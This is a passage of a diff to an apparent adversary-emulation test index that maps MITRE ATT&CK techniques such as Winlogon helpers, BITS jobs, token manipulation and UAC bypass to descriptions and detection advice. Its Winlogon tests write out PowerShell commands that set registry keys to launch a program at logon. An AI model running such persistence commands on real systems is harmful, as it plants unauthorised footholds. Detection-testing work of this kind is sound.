+ to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify + - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit + - points to userinit.exe, the user initialization program executed when a + user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell + executed when a user logs on\n\nAdversaries may take advantage of these features + to repeatedly execute malicious code and establish persistence." + name: Winlogon Helper DLL + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.004 + url: https://attack.mitre.org/techniques/T1547/004 + - external_id: CAPEC-579 + source_name: capec + url: https://capec.mitre.org/data/definitions/579.html + - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order + description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, + Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' + source_name: Cylance Reg Persistence Sept 2013 + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Praetorian + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Module: Module Load' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious. + + Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_permissions_required: + - SYSTEM + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1547.004 + atomic_tests: + - name: Winlogon Shell Key Persistence - PowerShell + auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38 + description: | + PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. + + Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. + supported_platforms: + - windows + input_arguments: + binary_to_execute: + description: Path of binary to execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" + "Shell" "explorer.exe, #{binary_to_execute}" -Force + +' + cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows + NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore + +' + name: powershell + - name: Winlogon Userinit Key Persistence - PowerShell + auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb + description: | + PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. + + Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. + supported_platforms: + - windows + input_arguments: + binary_to_execute: + description: Path of binary to execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" + "Userinit" "Userinit.exe, #{binary_to_execute}" -Force + +' + cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows + NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore + +' + name: powershell + - name: Winlogon Notify Key Logon Persistence - PowerShell + auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 + description: | + PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. + + Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff. + supported_platforms: + - windows + input_arguments: + binary_to_execute: + description: Path of notification package to execute + type: Path + default: C:\Windows\Temp\atomicNotificationPackage.dll + executor: + command: | + New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force + Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force + cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" + -Force -ErrorAction Ignore + +' + name: powershell + T1547.013: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.013 + url: https://attack.mitre.org/techniques/T1547/013 + - description: Free Desktop. (2006, February 13). Desktop Application Autostart + Specification. Retrieved September 12, 2019. + url: https://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html + source_name: Free Desktop Application Autostart Feb 2006 + - description: Free Desktop. (2017, December 24). Recognized Desktop Entry Keys. + Retrieved September 12, 2019. + url: https://specifications.freedesktop.org/desktop-entry-spec/1.2/ar01s06.html + source_name: Free Desktop Entry Keys + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: XDG Autostart Entries + description: |- + Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the /etc/xdg/autostart or ~/.config/autostart directories and have a .desktop file extension.(Citation: Free Desktop Application Autostart Feb 2006) + + Within an XDG autostart entry file, the Type key specifies if the entry is an application (type 1), link (type 2) or directory (type 3). The Name key indicates an arbitrary name assigned by the creator and the Exec key indicates the application and command line arguments to execute.(Citation: Free Desktop Entry Keys) + + Adversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make XDG autostart entries look as if they are associated with legitimate programs. + id: attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-11-10T15:55:10.103Z' + created: '2019-09-10T18:13:12.195Z' + x_mitre_is_subtechnique: true + x_mitre_contributors: + - Tony Lambert, Red Canary + x_mitre_detection: "Malicious XDG autostart entries may be detected by auditing + file creation and modification events within the /etc/xdg/autostart + and ~/.config/autostart directories. Depending on individual + configurations, defenders may need to query the environment variables $XDG_CONFIG_HOME + or $XDG_CONFIG_DIRS to determine the paths of Autostart entries. + Autostart entry files not associated with legitimate packages may be considered + suspicious. Suspicious entries can also be identified by comparing entries + to a trusted system baseline.\n \nSuspicious processes or scripts spawned + in this manner will have a parent process of the desktop component implementing + the XDG specification and will execute as the logged on user." + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_version: '1.0' + x_mitre_permissions_required: + - User + - root + x_mitre_platforms: + - Linux + atomic_tests: [] +defense-evasion: + T1548: + technique: + external_references: + - source_name: mitre-attack + external_id: T1548 + url: https://attack.mitre.org/techniques/T1548 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Abuse Elevation Control Mechanism + description: Adversaries may circumvent mechanisms designed to control elevate + privileges to gain higher-level permissions. Most modern systems contain native + elevation control mechanisms that are intended to limit privileges that a + user can perform on a machine. Authorization has to be granted to specific + users in order to perform tasks that can be considered of higher risk. An + adversary can perform several methods to take advantage of built-in control + mechanisms in order to escalate privileges on a system. + id: attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-07-22T21:36:52.825Z' + created: '2020-01-30T13:58:14.373Z' + x_mitre_data_sources: + - 'Process: Process Metadata' + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'File: File Metadata' + - 'File: File Modification' + - 'Process: OS API Execution' + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: |- + Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). + + Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling. + + On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file. + + There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + atomic_tests: [] + T1134: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1134 + url: https://attack.mitre.org/techniques/T1134 + - external_id: CAPEC-633 + source_name: capec + url: https://capec.mitre.org/data/definitions/633.html + - url: https://pentestlab.blog/2017/04/03/token-manipulation/ + description: netbiosX. (2017, April 3). Token Manipulation. Retrieved April + 21, 2017. + source_name: Pentestlab Token Manipulation + - url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing + description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved + April 21, 2017. + source_name: Microsoft Command-line Logging + - url: https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx + description: Microsoft TechNet. (n.d.). Retrieved April 25, 2017. + source_name: Microsoft LogonUser + - url: https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx + description: Microsoft TechNet. (n.d.). Retrieved April 25, 2017. + source_name: Microsoft DuplicateTokenEx + - url: https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx + description: Microsoft TechNet. (n.d.). Retrieved April 25, 2017. + source_name: Microsoft ImpersonateLoggedOnUser + - url: https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf + description: 'Atkinson, J., Winchester, R. (2017, December 7). A Process is + No One: Hunting for Token Manipulation. Retrieved December 21, 2017.' + source_name: BlackHat Atkinson Winchester Token Manipulation + description: |- + Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. + + An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation) + + Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens. + name: Access Token Manipulation + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-24T13:40:52.952Z' + created: '2017-12-14T16:46:06.044Z' + x_mitre_defense_bypassed: + - Windows User Account Control + - System access controls + - File system access controls + - Heuristic Detection + - Host forensic analysis + x_mitre_is_subtechnique: false + x_mitre_version: '2.0' + x_mitre_contributors: + - Tom Ueltschi @c_APT_ure + - Travis Smith, Tripwire + - Robby Winchester, @robwinchester3 + - Jared Atkinson, @jaredcatkinson + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Process: Process Metadata' + - 'Process: OS API Execution' + - 'User Account: User Account Metadata' + - 'Active Directory: Active Directory Object Modification' + - 'Command: Command Execution' x_mitre_detection: "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. @@ -26430,17 +18352,17 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-09-16T19:40:02.024Z' + modified: '2021-04-14T18:09:45.539Z' created: '2020-01-30T17:37:22.261Z' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_defense_bypassed: - System Access Controls x_mitre_detection: Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs. x_mitre_data_sources: - - Office 365 audit logs - - OAuth audit logs + - 'Web Credential: Web Credential Usage' + - 'Application Log: Application Log Content' x_mitre_contributors: - Shailesh Tiwary (Indian Army) - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC) @@ -26449,6 +18371,7 @@ defense-evasion: x_mitre_platforms: - Office 365 - SaaS + - Google Workspace atomic_tests: [] T1055.004: technique: @@ -26475,7 +18398,7 @@ defense-evasion: description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 + source_name: Elastic Process Injection July 2017 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -26507,14 +18430,14 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-06-20T22:17:05.394Z' + modified: '2020-11-10T18:29:30.961Z' created: '2020-01-14T01:29:43.786Z' x_mitre_defense_bypassed: - Application control - Anti-virus x_mitre_data_sources: - - Process monitoring - - API monitoring + - 'Process: OS API Execution' + - 'Process: Process Access' x_mitre_detection: "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances @@ -26523,7 +18446,7 @@ defense-evasion: such as SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, - may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze + may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. " @@ -26561,13 +18484,13 @@ defense-evasion: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: BITS Jobs description: |- - Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM). (Citation: Microsoft COM) (Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. + Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. - The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft BITS) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. (Citation: Microsoft BITSAdmin) + The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) - Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. (Citation: CTU BITS Malware June 2016) (Citation: Mondok Windows PiggyBack BITS May 2007) (Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots). (Citation: PaloAlto UBoatRAT Nov 2017) (Citation: CTU BITS Malware June 2016) + Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016) - BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). (Citation: CTU BITS Malware June 2016) + BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016) external_references: - source_name: mitre-attack external_id: T1197 @@ -26603,6 +18526,11 @@ defense-evasion: description: Microsoft. (2011, July 19). Issues with BITS. Retrieved January 12, 2018. source_name: Microsoft Issues with BITS July 2011 + - source_name: Elastic - Hunting for Persistence Part 1 + url: https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1 + description: 'French, D., Murphy, B. (2020, March 24). Adversary tradecraft + 101: Hunting for persistence using Elastic Security (Part 1). Retrieved + December 21, 2020.' object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 type: attack-pattern @@ -26611,7 +18539,7 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence - modified: '2020-03-25T23:28:10.049Z' + modified: '2021-04-13T21:36:04.956Z' created: '2018-04-18T17:59:24.739Z' x_mitre_is_subtechnique: false x_mitre_platforms: @@ -26621,23 +18549,25 @@ defense-evasion: - Administrator - SYSTEM x_mitre_detection: |- - BITS runs as a service and its status can be checked with the Sc query utility (sc query bits). (Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose). (Citation: Microsoft BITS) + BITS runs as a service and its status can be checked with the Sc query utility (sc query bits).(Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose).(Citation: Microsoft BITS) - Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options) (Citation: Microsoft BITS)Admin and the Windows Event log for BITS activity. Also consider investigating more detailed information about jobs by parsing the BITS job database. (Citation: CTU BITS Malware June 2016) + Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016) - Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account). (Citation: Microsoft BITS) + Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).(Citation: Microsoft BITS) x_mitre_defense_bypassed: - Firewall - Host forensic analysis x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - Packet capture - - Windows event logs + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Service: Service Metadata' + - 'Command: Command Execution' x_mitre_contributors: + - Brent Murphy, Elastic + - David French, Elastic - Ricardo Dias - Red Canary - x_mitre_version: '1.1' + x_mitre_version: '1.2' identifier: T1197 atomic_tests: - name: Bitsadmin Download (cmd) @@ -26767,6 +18697,31 @@ defense-evasion: name: command_prompt T1027.001: technique: + created: '2020-02-05T14:04:25.865Z' + modified: '2020-09-17T18:25:33.828Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5 + description: "Adversaries may use binary padding to add junk data and change + the on-disk representation of malware. This can be done without affecting + the functionality or behavior of a binary, but can increase the size of the + binary beyond what some security tools are capable of handling due to file + size limitations. \n\nBinary padding effectively changes the checksum of the + file and can also be used to avoid hash-based blocklists and static anti-virus + signatures.(Citation: ESET OceanLotus) The padding used is commonly generated + by a function to create junk data and then appended to the end or applied + to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing + the file size may decrease the effectiveness of certain tools and detection + capabilities that are not designed or configured to scan large files. This + may also reduce the likelihood of being collected for analysis. Public file + scanning services, such as VirusTotal, limits the maximum size of an uploaded + file to be analyzed.(Citation: VirusTotal FAQ) " + name: Binary Padding + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1027.001 @@ -26788,53 +18743,26 @@ defense-evasion: - source_name: VirusTotal FAQ url: https://www.virustotal.com/en/faq/ description: VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Binary Padding - description: "Adversaries may use binary padding to add junk data and change - the on-disk representation of malware. This can be done without affecting - the functionality or behavior of a binary, but can increase the size of the - binary beyond what some security tools are capable of handling due to file - size limitations. \n\nBinary padding effectively changes the checksum of the - file and can also be used to avoid hash-based blocklists and static anti-virus - signatures.(Citation: ESET OceanLotus) The padding used is commonly generated - by a function to create junk data and then appended to the end or applied - to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing - the file size may decrease the effectiveness of certain tools and detection - capabilities that are not designed or configured to scan large files. This - may also reduce the likelihood of being collected for analysis. Public file - scanning services, such as VirusTotal, limits the maximum size of an uploaded - file to be analyzed.(Citation: VirusTotal FAQ) " - id: attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-17T18:25:33.828Z' - created: '2020-02-05T14:04:25.865Z' - x_mitre_contributors: - - Martin Jirkal, ESET - x_mitre_data_sources: - - Process monitoring - - Binary file metadata - - File monitoring - - Malware reverse engineering + x_mitre_defense_bypassed: + - Anti-virus + - Signature-based detection + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' x_mitre_detection: 'Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool. When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file. ' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_defense_bypassed: - - Anti-virus - - Signature-based detection + x_mitre_data_sources: + - 'File: File Metadata' + - 'File: File Content' + x_mitre_contributors: + - Martin Jirkal, ESET identifier: T1027.001 atomic_tests: - name: Pad Binary to Change Hash - Linux/macOS dd @@ -26919,31 +18847,82 @@ defense-evasion: of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis. x_mitre_data_sources: - - VBR - - MBR - - API monitoring + - 'Drive: Drive Modification' x_mitre_platforms: - Linux - Windows atomic_tests: [] - T1548.002: + T1612: technique: - id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073 - description: |- - Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works) - - If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) - - Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: - - * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit) - - Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) - name: Bypass User Account Control + id: attack-pattern--800f9819-7007-4540-a520-40e655876800 + description: "Adversaries may build a container image directly on a host to + bypass defenses that monitor for the retrieval of malicious images from a + public registry. A remote build request may be sent to the Docker + API that includes a Dockerfile that pulls a vanilla base image, such as alpine, + from a public or local registry and then builds a custom image upon it.(Citation: + Docker Build Image)\n\nAn adversary may take advantage of that build + API to build a custom image on the host that includes malware downloaded from + their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) + using that custom image.(Citation: Aqua Build Images on Hosts) If the base + image is pulled from a public registry, defenses will likely not detect the + image as malicious since it’s a vanilla image. If the base image already resides + in a local registry, the pull may be considered even less suspicious since + the image is already in the environment. " + name: Build Image on Host created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: + - source_name: mitre-attack + external_id: T1612 + url: https://attack.mitre.org/techniques/T1612 + - source_name: Docker Build Image + url: https://docs.docker.com/engine/api/v1.41/#operation/ImageBuild + description: Docker. ( null). Docker Engine API v1.41 Reference - Build an + Image. Retrieved March 30, 2021. + - source_name: Aqua Build Images on Hosts + url: https://blog.aquasec.com/malicious-container-image-docker-container-host + description: 'Assaf Morag. (2020, July 15). Threat Alert: Attackers Building + Malicious Images on Your Hosts. Retrieved March 29, 2021.' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-19T13:39:56.999Z' + created: '2021-03-30T17:54:03.944Z' + x_mitre_platforms: + - Containers + x_mitre_contributors: + - Assaf Morag, @MoragAssaf, Team Nautilus Aqua Security + - Roi Kol, @roykol1, Team Nautilus Aqua Security + - Michael Katchinskiy, @michael64194968, Team Nautilus Aqua Security + - Vishwas Manral, McAfee + x_mitre_detection: Monitor for unexpected Docker image build requests to the + Docker daemon on hosts in the environment. Additionally monitor for subsequent + network communication with anomalous IPs that have never been seen before + in the environment that indicate the download of malicious code. + x_mitre_permissions_required: + - User + - root + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' + x_mitre_data_sources: + - 'Image: Image Creation' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + atomic_tests: [] + T1548.002: + technique: + created: '2020-01-30T14:24:34.977Z' + modified: '2020-07-22T21:36:52.458Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + external_references: - source_name: mitre-attack external_id: T1548.002 url: https://attack.mitre.org/techniques/T1548/002 @@ -26986,23 +18965,30 @@ defense-evasion: description: Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017. source_name: enigma0x3 sdclt bypass - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: 